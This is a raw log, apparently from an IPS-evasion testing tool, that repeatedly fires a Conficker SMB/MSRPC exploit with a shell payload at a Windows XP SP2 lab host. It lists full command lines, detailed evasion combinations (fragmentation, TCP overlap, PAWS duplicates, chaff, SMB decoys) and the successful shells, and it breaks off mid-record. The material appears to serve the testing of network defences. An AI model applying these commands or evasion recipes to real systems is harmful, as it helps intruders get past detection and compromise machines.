- SECURITY BREACHES: 423 | DURATION: 43229 SEC
- Info: Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
- 2015-06-07 23:19:27 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
- 2015-06-07 23:19:27 INFO Victim check disabled - will NOT notice if victim is no longer running
- 2015-06-07 23:19:29 INFO Using rand seed Wcn7q/xCpWQ=
- 2015-06-07 23:19:29 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
- 2015-06-07 23:19:29 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
- Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
- ..
- 2 runs averaging 1.63 runs / second ; progress: 1/43200...................2015-06-07 23:19:33 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62021 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=P2RHsq/Wcjc --evasion=[msrpc_bind,msrpc_req]ipv4_frag,"24" --evasion=[msrpc_req,end]tcp_paws,"1","268435453","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed P2RHsq/Wcjc
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage msrpc_req to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.111:62021 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ...............2015-06-07 23:19:36 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51525 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ElGy0J/TZpw --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1479","new","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed ElGy0J/TZpw
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.117:51525 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 40 runs averaging 6.31 runs / second ; progress: 6/43200..............................
- 70 runs averaging 6.13 runs / second ; progress: 11/43200.........................
- 95 runs averaging 5.76 runs / second ; progress: 16/43200.........................
- 120 runs averaging 5.57 runs / second ; progress: 22/43200.....2015-06-07 23:19:52 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13515 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=IR1Yko0dPgg --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"3","empty_unspec|empty_keepalive|small_unspec|http_post|broken_length" --evasion=[smb_opentree,end]tcp_paws,"1","117616708","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed IR1Yko0dPgg
- The following evasions are applied from stage smb_connect to smb_opentree:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 117616708> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.118:13515 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .............2015-06-07 23:19:54 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58996 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=dJz7n8sKZ9A --evasion=[smb_opentree,end]tcp_chaff,"75%","nullchksum|nullflag|outofwindow","random" --evasion=[smb_connect,end]tcp_overlap,"5","new","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed dJz7n8sKZ9B
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * Duplicate packet has random bytes as payload
- Info: NetBIOS connection 10.62.90.110:58996 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........2015-06-07 23:19:55 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53735 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Q1Ry+56Ny4g --evasion=[smb_opentree,end]smb_decoytrees,"5","6","7","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"3","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_chaff,"75%","nullchksum|nullflag|outofwindow|shorthdr","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed Q1Ry+56Ny4h
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.110:53735 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......
- 155 runs averaging 5.83 runs / second ; progress: 27/43200.................2015-06-07 23:19:59 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24638 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Ufs+GHrFFUA --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"32" --evasion=[smb_opentree,msrpc_req]ipv4_order,"firstlast" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Ufs+GHrFFUB
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 32 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - IPv4 fragments are sent in correct order except that the first fragment comes last
- Info: NetBIOS connection 10.62.90.114:24638 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...2015-06-07 23:20:00 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13965 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UB07gamyjBM --evasion=[smb_connect,end]tcp_paws,"50%","215801129","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","190724998","random" --verifydelay=1000 --payload=shell
- Info: Using random seed UB07gamyjBN
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 215801129> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190724998> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.113:13965 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ........
- 185 runs averaging 5.83 runs / second ; progress: 32/43200...2015-06-07 23:20:03 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26112 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=MkfDE4ODgEw --evasion=[msrpc_req,end]smb_chaff,"2","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","4","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed MkfDE4ODgEw
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - Before every 2th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.117:26112 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..................
- 207 runs averaging 5.63 runs / second ; progress: 37/43200...............
- 222 runs averaging 5.31 runs / second ; progress: 42/43200...........
- 233 runs averaging 4.98 runs / second ; progress: 47/43200............
- 245 runs averaging 4.73 runs / second ; progress: 52/43200.............
- 258 runs averaging 4.54 runs / second ; progress: 57/43200..............
- 272 runs averaging 4.39 runs / second ; progress: 62/43200................
- 288 runs averaging 4.30 runs / second ; progress: 67/43200.....................
- 309 runs averaging 4.30 runs / second ; progress: 72/43200..............
- 323 runs averaging 4.20 runs / second ; progress: 77/43200.....
- 328 runs averaging 4.00 runs / second ; progress: 82/43200......
- 334 runs averaging 3.84 runs / second ; progress: 87/43200.......2015-06-07 23:21:01 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21232 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=AjLLEsF6RyU --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"349","random" --evasion=[smb_opentree,msrpc_req]tcp_chaff,"21","chksum|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed AjLLEsF6RyU
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - With every 21 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * TCP header shorter than 20 bytes
- * Duplicate packet has original payload with alphanumeric bytes randomized
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 349 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- Info: NetBIOS connection 10.62.90.112:21232 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 345 runs averaging 3.75 runs / second ; progress: 92/43200................
- 361 runs averaging 3.72 runs / second ; progress: 97/43200......2015-06-07 23:21:09 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22183 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=gueqfnfgtKk --evasion=tcp_nocwnd --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed gueqfnfgtKm
- - TCP congestion window is not used.
- The following evasions are applied from stage smb_openpipe to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:22183 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 379 runs averaging 3.71 runs / second ; progress: 102/43200.........
- 388 runs averaging 3.62 runs / second ; progress: 107/43200......
- 394 runs averaging 3.51 runs / second ; progress: 112/43200.......2015-06-07 23:21:27 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10588 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=WTkrkazPR60 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","111364770","alphanumrandomized" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
- Info: Using random seed WTkrkazPR61
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 1048575 bytes.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 111364770> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.118:10588 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 403 runs averaging 3.44 runs / second ; progress: 117/43200...............
- 418 runs averaging 3.42 runs / second ; progress: 122/43200.........2015-06-07 23:21:36 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43982 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=00v8sOxbBJs --evasion=[smb_opentree,msrpc_req]ipv4_frag,"16" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","5","7","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed 00v8sOxbBJv
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - IPv4 fragments with at most 16 bytes per fragment
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.112:43982 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 431 runs averaging 3.38 runs / second ; progress: 127/43200...........
- 442 runs averaging 3.34 runs / second ; progress: 132/43200...........
- 453 runs averaging 3.30 runs / second ; progress: 137/43200.......
- 460 runs averaging 3.23 runs / second ; progress: 142/43200........
- 468 runs averaging 3.17 runs / second ; progress: 147/43200..
- 470 runs averaging 3.08 runs / second ; progress: 152/43200.....
- 475 runs averaging 3.02 runs / second ; progress: 157/43200..2015-06-07 23:22:09 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=FcbWMtZoa2Y --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"439","random" --evasion=[smb_openpipe,end]tcp_paws,"25%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed FcbWMtZoa2Y
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 439 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.117:19364 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 479 runs averaging 2.95 runs / second ; progress: 162/43200...
- 482 runs averaging 2.88 runs / second ; progress: 167/43200
- 482 runs averaging 2.79 runs / second ; progress: 172/43200............
- 494 runs averaging 2.78 runs / second ; progress: 177/43200.....................
- 515 runs averaging 2.82 runs / second ; progress: 182/43200.........
- 524 runs averaging 2.79 runs / second ; progress: 188/43200.....
- 529 runs averaging 2.75 runs / second ; progress: 193/43200
- 529 runs averaging 2.68 runs / second ; progress: 198/43200.......2015-06-07 23:22:50 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61516 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=s09eyA+Hq5o --evasion=[smb_opentree,end]tcp_paws,"13","8","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"1","9","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed s09eyA+Hq5q
- The following evasions are applied from stage smb_opentree to end:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.117:61516 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 543 runs averaging 2.68 runs / second ; progress: 203/43200..2015-06-07 23:22:53 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32101 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=7vh9Q4gm0XQ --evasion=[smb_connect,end]ipv4_opt,"8","inc","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","14791099","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 7vh9Q4gm0XT
- The following evasions are applied from stage smb_connect to end:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 14791099> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.113:32101 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 558 runs averaging 2.69 runs / second ; progress: 208/43200.......
- 565 runs averaging 2.66 runs / second ; progress: 213/43200......
- 571 runs averaging 2.62 runs / second ; progress: 218/43200....
- 575 runs averaging 2.58 runs / second ; progress: 223/43200.......2015-06-07 23:23:16 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29396 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=lVpgbd+BmFc --evasion=[smb_connect,msrpc_req]ipv4_opt,"3","inc","zero" --evasion=[smb_connect,end]tcp_paws,"1","268435455","shuffle" --evasion=[netbios_connect,end]tcp_recv_window,"269717" --verifydelay=1000 --payload=shell
- Info: Using random seed lVpgbd+BmFe
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 269717 bytes.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage smb_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.113:29396 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 589 runs averaging 2.59 runs / second ; progress: 228/43200...................
- 608 runs averaging 2.61 runs / second ; progress: 233/43200.....
- 613 runs averaging 2.58 runs / second ; progress: 238/43200...
- 616 runs averaging 2.54 runs / second ; progress: 243/43200..
- 618 runs averaging 2.49 runs / second ; progress: 248/43200..........
- 628 runs averaging 2.48 runs / second ; progress: 253/43200.......
- 635 runs averaging 2.46 runs / second ; progress: 258/432002015-06-07 23:23:48 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34169 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Deh5nhWGiuo --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"2","1","2047","random" --evasion=[netbios_connect,end]tcp_paws,"1","46504624","random_alphanum" --evasion=[netbios_connect,end]tcp_segvar,"3","20067" --verifydelay=1000 --payload=shell
- Info: Using random seed Deh5nhWGiuo
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 46504624> and has random alphanumeric bytes as payload
- - TCP packets are segmented to contain between 3 and 20067 bytes of payload.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2047 random bytes.
- Info: NetBIOS connection 10.62.90.118:34169 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 2015-06-07 23:23:50 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49654 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=AgruJf0YDvE --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"1112" --evasion=[smb_connect,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,end]tcp_paws,"2","268435455","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed AgruJf0YDvE
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 1112 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:49654 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 639 runs averaging 2.43 runs / second ; progress: 263/43200..........
- 649 runs averaging 2.42 runs / second ; progress: 268/43200....
- 653 runs averaging 2.39 runs / second ; progress: 273/43200......
- 659 runs averaging 2.37 runs / second ; progress: 278/43200......
- 665 runs averaging 2.35 runs / second ; progress: 283/43200....
- 669 runs averaging 2.32 runs / second ; progress: 288/43200....
- 673 runs averaging 2.30 runs / second ; progress: 293/43200.......
- 680 runs averaging 2.28 runs / second ; progress: 298/43200.........Pid 27321 timed out - killed
- 2015-06-07 23:24:31 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48251 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=FadBcaLVpzM --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1478","new","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed FadBcaLVpzM
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- - Add a zero urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:48251 -> 10.35.1.207:445
- Terminated
- ..
- 692 runs averaging 2.28 runs / second ; progress: 303/43200......
- 698 runs averaging 2.27 runs / second ; progress: 308/43200.......
- 705 runs averaging 2.25 runs / second ; progress: 313/43200....2015-06-07 23:24:47 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60901 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=5rcJEIzKfQ8 --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"10","new","random_alphanum" --evasion=[start,msrpc_req]tcp_paws,"50%","4","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5rcJEIzKfQ/
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP segments are set to overlap by 10 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
